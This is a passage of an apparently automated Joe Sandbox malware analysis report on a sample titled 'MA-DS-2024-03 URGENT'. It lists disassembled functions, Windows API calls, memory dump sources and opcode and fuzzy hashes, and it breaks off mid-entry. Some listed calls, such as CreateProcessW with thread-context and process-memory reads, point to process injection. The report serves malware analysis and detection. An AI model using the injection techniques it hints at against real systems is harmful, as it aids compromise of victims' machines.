                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$_memmove
                                                        • String ID:
                                                        • API String ID: 3033907384-0
                                                        • Opcode ID: 9fc4be26d96f23e2fd3dec38f1207a0408a4a6382bde92808a88b76bec9bec88
                                                        • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                                                        • Opcode Fuzzy Hash: 9fc4be26d96f23e2fd3dec38f1207a0408a4a6382bde92808a88b76bec9bec88
                                                        • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                                                        Function 01675D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01675D6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: b3664c5737ee39714e2ea097c43f58ae7bc6537a146aecc441d8b0e909573902
                                                        • Instruction ID: 8d74d54f4958a19792173b3c8d6ac6af7e6896c68efa9d9096939804b8b1979f
                                                        • Opcode Fuzzy Hash: b3664c5737ee39714e2ea097c43f58ae7bc6537a146aecc441d8b0e909573902
                                                        • Instruction Fuzzy Hash: 85F0B453E04340EAEA7F03ACED8DB713E10E7016A9F0C50C9A3435A3A397555857C60D
                                                        Function 00B64265 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00B64A23
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B64AB9
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B64ADB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction ID: 381bdfb5fe8a87baa974416e7910c299cd8a34b09f00ce3439d47ef3f4e03585
                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction Fuzzy Hash: D112CE24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                        Function 01675F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41f040c5c96e993f02081a65f14c53ac652d498761ef1d58b5b29f058d996586
                                                        • Instruction ID: 84363f1a5db9a7dd7a14e425c9d70ed7f3f0ecded37441ecc1a1cd766f5ea901
                                                        • Opcode Fuzzy Hash: 41f040c5c96e993f02081a65f14c53ac652d498761ef1d58b5b29f058d996586
                                                        • Instruction Fuzzy Hash: F971D42180CB808EF737872CCD18675BF716B52264F4D8ADAD2978B3A3D3798445CB92
                                                        Function 0040F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f99b2fa1f82a18a8585a21b319ce60e29218eb5c4cc1421af370e0158a5572f3
                                                        • Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
                                                        • Opcode Fuzzy Hash: f99b2fa1f82a18a8585a21b319ce60e29218eb5c4cc1421af370e0158a5572f3
                                                        • Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59
                                                        Function 00411FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f11e64fe7881dd54875cb938b1da74a75137d71ef6380f15b6d317cce4d22b25
                                                        • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                                                        • Opcode Fuzzy Hash: f11e64fe7881dd54875cb938b1da74a75137d71ef6380f15b6d317cce4d22b25
                                                        • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                                                        Function 01676490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 030085fe395fb9b2d690e5a5924655657a28692294b1633d152d7f012e7e651b
                                                        • Instruction ID: f2aaf07d39dc7a550ad12c14ff96cfe6c5e116dc3aa3fcd7f3dd41a333c9bf6c
                                                        • Opcode Fuzzy Hash: 030085fe395fb9b2d690e5a5924655657a28692294b1633d152d7f012e7e651b
                                                        • Instruction Fuzzy Hash: 1331C96190DB408EFB378B6CCD483397EB16B81664F48C59AD2968A3A7D7798009CB52
                                                        Function 00405AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                        • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                                                        • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                        • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                                                        Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                        Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 97021d4f32bf3e563f1c3d98945ec58ba0baed1b1e7fd12fc4625a598daddbb7
                                                        • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                        • Opcode Fuzzy Hash: 97021d4f32bf3e563f1c3d98945ec58ba0baed1b1e7fd12fc4625a598daddbb7
                                                        • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                        Function 004059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 158370926a79d7dcef4898dd312af6e718ea50f97a9e72c022e6d213e21be2ee
                                                        • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                        • Opcode Fuzzy Hash: 158370926a79d7dcef4898dd312af6e718ea50f97a9e72c022e6d213e21be2ee
                                                        • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                        Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                          • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                          • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                          • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                        • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                        • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                        • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                        Function 00407F77 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 6131b91a2293182e5e803a8fd7e0457fbee9f472f48ec417c52c5e1864e76581
                                                        • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                        • Opcode Fuzzy Hash: 6131b91a2293182e5e803a8fd7e0457fbee9f472f48ec417c52c5e1864e76581
                                                        • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                        Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: d91c9a0b3bf6359c916e12f661e99ff5d5878bbf1d500bec4267ef2357e72d6d
                                                        • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                        • Opcode Fuzzy Hash: d91c9a0b3bf6359c916e12f661e99ff5d5878bbf1d500bec4267ef2357e72d6d
                                                        • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                        Function 00405BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                        • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                                                        • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                        • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                                                        Function 00405A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                        • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                                                        • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                        • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                                                        Function 01676086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 304b45ec122365414655b6bf029f4d371202e4ea4dac0fe0e255f5ae95c1e6a7
                                                        • Instruction ID: a424ae6830caa611b3bf155f3c3ae41a361d19374b3aca24ff94f231c4bee2fa
                                                        • Opcode Fuzzy Hash: 304b45ec122365414655b6bf029f4d371202e4ea4dac0fe0e255f5ae95c1e6a7
                                                        • Instruction Fuzzy Hash: 0C01847180D7409EF7278B2CDD183357FB06B46251F098A8AE2869B3A3D3348504CB52
                                                        Function 004676C4 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • _memset.LIBCMT ref: 004676F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 525207782-0
                                                        • Opcode ID: 9555b1be65f6cc201d46ffb337004c3217807583d620af0eadc191d72ebc532e
                                                        • Instruction ID: a02646e32d60fd8157826bfae3d35e85af431b7d668d4f5288a7981e8dd69dd8
                                                        • Opcode Fuzzy Hash: 9555b1be65f6cc201d46ffb337004c3217807583d620af0eadc191d72ebc532e
                                                        • Instruction Fuzzy Hash: 7A01F6792142009FD721EF5DD941F41BBE1AF5A314F24C46EE5888B392DB7AE800CB99
                                                        Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 004248A6
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
